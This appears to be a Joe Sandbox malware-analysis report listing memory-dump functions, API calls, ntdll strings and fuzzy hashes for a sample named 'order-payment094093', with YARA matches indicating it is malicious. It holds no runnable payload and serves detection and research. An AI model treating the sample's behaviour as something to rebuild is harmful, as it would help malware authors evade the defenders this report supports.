Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f3f6030fe9ce9d35ba2452bf73a7442267fc73f09157b6ef640f9d6b05dabec9
Instruction ID: cacefd3da9236fb71126cdfd66aba57dec6db2d770ecf36bb5dd698618ab061e
Opcode Fuzzy Hash: f3f6030fe9ce9d35ba2452bf73a7442267fc73f09157b6ef640f9d6b05dabec9
Instruction Fuzzy Hash: 2090022922340002D2807158540C60B000597D1202F95D425A1015558CC92589695321

Function 01262DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01262DFA

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c6b3f6cb76886e96bd85362f62bb37b66d01a3a0e6e81c80049dd295470b208c
Instruction ID: 513b81ef8549db7fa22c6324a1659d4f4f34b1f60f6c3e382ebfc34830929f09
Opcode Fuzzy Hash: c6b3f6cb76886e96bd85362f62bb37b66d01a3a0e6e81c80049dd295470b208c
Instruction Fuzzy Hash: 5390023121240413D21171584508707000997D0241F95C422A1424558DD6668A52A221

Function 01262DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01262DDA

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c53c720cacdf61d5fe305f7067d2602cd2d1cd699bb1113cae23287d9be3c1e1
Instruction ID: f0c4d62a3403aa6b71387e89f98bce6d50aa01ca6e804b4f758017e4fae7d9df
Opcode Fuzzy Hash: c53c720cacdf61d5fe305f7067d2602cd2d1cd699bb1113cae23287d9be3c1e1
Instruction Fuzzy Hash: 75900221253441525645B15844085074006A7E0241795C022A2414950CC5369956D721

Function 01262C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01262C7A

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8686d7838da3a0abc5e07d55d628478bf6ffdfbd3deab996f984fdd26f318264
Instruction ID: b03f212a8282067f67f5effc447fb6e51ccefee291f358b39ba9d54b8912653a
Opcode Fuzzy Hash: 8686d7838da3a0abc5e07d55d628478bf6ffdfbd3deab996f984fdd26f318264
Instruction Fuzzy Hash: 3890023121248802D2107158840874B000597D0301F59C421A5424658DC6A589917221

Function 01262CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01262CAA

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 983fa80c70789a4fd640a91c6be4bd9d0f6aa4f99212b5aa40f25b325191bcfb
Instruction ID: ee30160c4f4fc312190dcdfc8cbdcc041dac57f427bf99cb743ecf8f36dd67a5
Opcode Fuzzy Hash: 983fa80c70789a4fd640a91c6be4bd9d0f6aa4f99212b5aa40f25b325191bcfb
Instruction Fuzzy Hash: AD90023121240402D2007598540C647000597E0301F55D021A6024555EC67589916231

Function 01262F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01262F3A

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7c51c32b4d5fb7de625c21f0ba434c3c3443981cb761c2be186431d6adc4cd7c
Instruction ID: 57fa554c684bad070fd3cb5e3f431f485c68da0d9e1c8d471949792036c81c0e
Opcode Fuzzy Hash: 7c51c32b4d5fb7de625c21f0ba434c3c3443981cb761c2be186431d6adc4cd7c
Instruction Fuzzy Hash: 8590026135240442D20071584418B070005D7E1301F55C025E2064554DC629CD526226

Function 01262FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01262FBA

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: faae5bebe6ec7a2ccbeffdaa77c4f8d18fe658a0470719e12f5a173546ac8811
Instruction ID: ca19492bb7aea3c5d2df5fac2913e846b8d47cdf878004572c305ee7df4faa71
Opcode Fuzzy Hash: faae5bebe6ec7a2ccbeffdaa77c4f8d18fe658a0470719e12f5a173546ac8811
Instruction Fuzzy Hash: BC900221612400424240716888489074005BBE1211755C131A1998550DC56989655765

Function 01262F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01262F9A

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 74d2bc718134019030ed2e7465132950bcd0530c16682c17d021412319b3988f
Instruction ID: 61c82cf9a875d0dc586fee70ddd59f47ade0446bafa107cb4ba011047b60371e
Opcode Fuzzy Hash: 74d2bc718134019030ed2e7465132950bcd0530c16682c17d021412319b3988f
Instruction Fuzzy Hash: A490023121280402D2007158481870B000597D0302F55C021A2164555DC63589516671

Function 01262FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01262FEA

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fdb30fb5a8eb42e8dd6d8d7e41e7b9cafb82b39782b823de165b51d269e68297
Instruction ID: 0c51f8b85acf6b8c869b2d64e7593c98e2683c874435735c1db25eaea3e4a5b4
Opcode Fuzzy Hash: fdb30fb5a8eb42e8dd6d8d7e41e7b9cafb82b39782b823de165b51d269e68297
Instruction Fuzzy Hash: 16900221222C0042D30075684C18B07000597D0303F55C125A1154554CC92589615621

Function 01262EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01262EAA

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8c4c774e62030c9e6a129b7f77d9146c554be48e0de21f538e786d9cc9b6dbe0
Instruction ID: a3cb098a4f11e79c7a914473fa7e6eddf69b54e73e10e0b1ffee1e6c3de503af
Opcode Fuzzy Hash: 8c4c774e62030c9e6a129b7f77d9146c554be48e0de21f538e786d9cc9b6dbe0
Instruction Fuzzy Hash: A590027121240402D24071584408747000597D0301F55C021A6064554EC6698ED56765

Function 01262E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01262E8A

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 57bb8ba8e57250b04f203d08ebdaf8277c77c43805a005c948d02add560ac6a9
Instruction ID: 9f2d2963b916bdba37f4dad438e7e6077452b43a4c19a7374d9e013990c1e1cd
Opcode Fuzzy Hash: 57bb8ba8e57250b04f203d08ebdaf8277c77c43805a005c948d02add560ac6a9
Instruction Fuzzy Hash: 8C90022161240502D20171584408617000A97D0241F95C032A2024555ECA358A92A231

Function 00409AB0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_order-payment094093.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5

Function 0041A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D

Strings

6EA, xrefs: 0041A652, 0041A65C

Memory Dump Source

Source File: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_order-payment094093.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: 6EA
API String ID: 1279760036-1400015478
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0

Function 00408308 Relevance: 1.6, APIs: 1, Instructions: 56
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_order-payment094093.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 20f7e89dd4318fb710409804771a2ef57eaca7dc768ea5f6a30b62f1f766f37d
Instruction ID: adfe85207a7732c7265c0c7d608cb19f4db3a9f8242adea04a83b146b3056af0
Opcode Fuzzy Hash: 20f7e89dd4318fb710409804771a2ef57eaca7dc768ea5f6a30b62f1f766f37d
Instruction Fuzzy Hash: D601D831A8032C77E720A6959D43FFE7B2C9B40F54F04011EFF04BA1C1E6A86A0547EA

Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_order-payment094093.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA

Function 0040ACE4 Relevance: 1.5, APIs: 1, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62

Memory Dump Source

Source File: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_order-payment094093.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: d0c78f07762592ecd678ccc8f72b8aa762ee206c2149e57a9c25068b29cf33f0
Instruction ID: dd876253cc453998c52c789a209606eb606730fc55fe267d25d5e32c98586545
Opcode Fuzzy Hash: d0c78f07762592ecd678ccc8f72b8aa762ee206c2149e57a9c25068b29cf33f0
Instruction Fuzzy Hash: D2F04475E4020DABDF10DEA4D985FDDB775AF44308F0482A6E9089B640F631DA59CB92

Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D

Memory Dump Source

Source File: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_order-payment094093.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0

Function 0041A6A3 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8

Memory Dump Source

Source File: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_order-payment094093.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 42b1b842ffaf0f810e4b500955293f731ab6542114eb78fb79b18f2b2cd96271
Instruction ID: f810aef8ca252b933eec1721cd9f465dd02de56c6e857bb67cf6b5b45b131227
Opcode Fuzzy Hash: 42b1b842ffaf0f810e4b500955293f731ab6542114eb78fb79b18f2b2cd96271
Instruction Fuzzy Hash: A7E04F71610204B7D3209B94CC85FD737ACAF49B50F148055BA586B281C635A901CAE1

Function 0041A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800

Memory Dump Source

Source File: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_order-payment094093.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5

Function 0041A6B0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8

Memory Dump Source

Source File: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_order-payment094093.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1

Function 0041A7C1 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800

Memory Dump Source

Source File: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_order-payment094093.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 5d1c70791c55b074595e1c0db5927fef9aaa8e9e605e6669c7d262309f17569e
Instruction ID: a2c68de5a9f8d74cc0d4cf1c6ab4d744d57d8e562e341e1e6228b3055af08213
Opcode Fuzzy Hash: 5d1c70791c55b074595e1c0db5927fef9aaa8e9e605e6669c7d262309f17569e
Instruction Fuzzy Hash: D9C08C3A3440336AD221BA6CD8805AA635AEBE03107248A52D488CBA06E732CADE0661

Function 01262C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01262C24

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d1d4f069eaf281ec1f8cc1dbdefd98bdfa71bde7b77924748612ed09044954c7
Instruction ID: 1e0e582e885c7bd7d032adecd7f14aacf6bf57844348643ad714d9e57226e1c7
Opcode Fuzzy Hash: d1d4f069eaf281ec1f8cc1dbdefd98bdfa71bde7b77924748612ed09044954c7
Instruction Fuzzy Hash: B7B09B719125D5C9DB11F764460C717790477D0701F16C071D3030645F4738C1D1E375

Non-executed Functions

Function 012A2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

MaxDeadActivationContexts, xrefs: 012A2D82
DisableHeapLookaside, xrefs: 012A246D
RaiseExceptionOnPossibleDeadlock, xrefs: 012A2579
DisableExceptionChainValidation, xrefs: 012A275F
@, xrefs: 012A2942
GlobalFlag2, xrefs: 012A2FC0
ShutdownFlags, xrefs: 012A24A1
UnloadEventTraceDepth, xrefs: 012A24C0
ExecuteOptions, xrefs: 012A25A0
TracingFlags, xrefs: 012A2549
GlobalFlag, xrefs: 012A2F3F, 012A3059
@, xrefs: 012A2B74
LdrpInitializeExecutionOptions, xrefs: 012A317D
MaxLoaderThreads, xrefs: 012A24EC
UseImpersonatedDeviceMap, xrefs: 012A251C
MinimumStackCommitInBytes, xrefs: 012A2BB0
CFGOptions, xrefs: 012A2967
minkernel\ntdll\ldrinit.c, xrefs: 012A3187
FrontEndHeapDebugOptions, xrefs: 012A2489
Initializing the application verifier package failed with status 0x%08lx, xrefs: 012A3176

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 91a5d018cad04a172ded70b7c3b1133a02f769cac236bd8bf240d1ffb0214938
Instruction ID: 1a9eee24742c2b8c8d94f8f3250361b216d5617801dceb38d83ba1d4e72f49a8
Opcode Fuzzy Hash: 91a5d018cad04a172ded70b7c3b1133a02f769cac236bd8bf240d1ffb0214938
Instruction Fuzzy Hash: EE928C71628342EFE725CF28C881B6ABBE8BB84754F44491DFB94D7291D770E844CB92

Function 01258620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 012954CE
Thread is in a state in which it cannot own a critical section, xrefs: 01295543
Invalid debug info address of this critical section, xrefs: 012954B6
Thread identifier, xrefs: 0129553A
Critical section address., xrefs: 01295502
Critical section debug info address, xrefs: 0129541F, 0129552E
Address of the debug info found in the active list., xrefs: 012954AE, 012954FA
8, xrefs: 012952E3
corrupted critical section, xrefs: 012954C2
undeleted critical section in freed memory, xrefs: 0129542B
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0129540A, 01295496, 01295519
Critical section address, xrefs: 01295425, 012954BC, 01295534
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 012954E2
double initialized or corrupted critical section, xrefs: 01295508

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: b713a632fb181e8f55ed38a2c43e3cfacb06594297d1d3c2f6ff751bb8daba74
Instruction ID: 7e157a067ecf868d6bcb8c64b5109dac31e6c36f60120676e1b7d618cfc4a712
Opcode Fuzzy Hash: b713a632fb181e8f55ed38a2c43e3cfacb06594297d1d3c2f6ff751bb8daba74
Instruction Fuzzy Hash: 20817CB0E60359AFDF21CF99C845BAEBBB5FB48714F10411AE608B7291D3B5A941CB60

Function 012529F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01292602
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01292506
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01292624
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 012922E4
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01292498
RtlpResolveAssemblyStorageMapEntry, xrefs: 0129261F
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01292409
@, xrefs: 0129259B
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01292412
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 012924C0
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 012925EB

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: 6bb7ea030826f6338ae157e60efd00c3f96d8660b827896013834b08de646ecd
Instruction ID: 55f4952f33b6a0507a586a2c2bc3bf220a660ad104b038ab4de6adebb7cf62bd
Opcode Fuzzy Hash: 6bb7ea030826f6338ae157e60efd00c3f96d8660b827896013834b08de646ecd
Instruction Fuzzy Hash: 390291B1D20229DFDF61DB58CC81BE9B7B8AB54304F0141D9AB49A7282D770AE84CF59

Function 012C8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

runtimebroker.exe, xrefs: 012C8B73
SegmentHeap, xrefs: 012C8BE9
DefaultBrowser_NOPUBLISHERID, xrefs: 012C8D00
svchost.exe, xrefs: 012C8B68
services.exe, xrefs: 012C8B96
smss.exe, xrefs: 012C8B8B
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 012C8BD0
csrss.exe, xrefs: 012C8B80
heapType, xrefs: 012C8BCB
lsass.exe, xrefs: 012C8BA1

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: e07bea032c4a44ac711578f889e1d29ab21aae5863253a0a75210ed040483560
Instruction ID: 6167c8774da86d11207023425c518b1ec3bd12205b71a15ba7413cdbdcac0365
Opcode Fuzzy Hash: e07bea032c4a44ac711578f889e1d29ab21aae5863253a0a75210ed040483560
Instruction Fuzzy Hash: 5551C3711243129BC329DF188944BABBBECFF98B50F148A1DEB59C3280E770D644C792

Function 0123AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON

Download Yara Rule

Strings

LdrpFindLoadedDllInternal, xrefs: 012882D7
minkernel\ntdll\ldrutil.c, xrefs: 012880B7
minkernel\ntdll\ldrfind.c, xrefs: 012882E1
DLL search path passed in externally: %ws, xrefs: 012880A6
LdrGetDllHandleEx, xrefs: 0128807C, 012883B2
Status: 0x%08lx, xrefs: 012882D0, 012883AB
LdrpInitializeDllPath, xrefs: 012880AD
DLL name: %wZ, xrefs: 01288075
minkernel\ntdll\ldrapi.c, xrefs: 01288086, 012883BC

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
